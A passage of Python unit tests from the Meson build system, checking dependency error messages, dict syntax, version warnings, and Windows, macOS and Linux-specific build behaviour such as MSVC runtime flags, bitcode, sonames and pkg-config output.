self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(boost_root.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. A wrap file from a subproject is used but fails because it does not
contain required keys.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
def test_error_func(self):
self.assertMesonRaises("error('a', 'b', ['c', ['d', {'e': 'f'}]], 'g')",
"Problem encountered: a b \['c', \['d', {'e' : 'f'}\]\] g")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
@mock.patch.dict(os.environ)
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd.exe with args without searching
prog = ExternalProgram('cmd', command=['cmd', '/C'])
self.assertTrue(prog.found(), msg='cmd not found with args')
self.assertPathEqual(prog.get_command()[0], 'cmd')
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# If `.PY` is in PATHEXT, scripts can be found as programs
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
# Finding a script in PATH w/o extension works and adds the interpreter
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script with an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script without an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
envvars.append(
mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if OptionKey('b_vscrt') not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
def test_compiler_checks_vscrt(self):
'''
Test that the correct VS CRT is used when running compiler checks
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if OptionKey('b_vscrt') not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
def sanitycheck_vscrt(vscrt):
checks = self.get_meson_log_sanitychecks()
self.assertTrue(len(checks) > 0)
for check in checks:
self.assertIn(vscrt, check)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=release'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=md'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mt'])
sanitycheck_vscrt('/MT')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mtd'])
sanitycheck_vscrt('/MTd')
def test_modules(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('C++ modules only work with the Ninja backend (not {}).'.format(self.backend.name))
if 'VSCMD_VER' not in os.environ:
raise unittest.SkipTest('C++ modules is only supported with Visual Studio.')
if version_compare(os.environ['VSCMD_VER'], '<16.9.0'):
raise unittest.SkipTest('C++ modules are only supported with VS 2019 Preview or newer.')
self.init(os.path.join(self.unit_test_dir, '87 cpp modules'))
self.build()
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '149 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '105 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
@mock.patch.dict(os.environ)
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/45 pkgconfig-gen/meson.build for description of the case this test
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content)
self.assertIn('Libs.private: -lz', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
@mock.patch.dict(os.environ)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
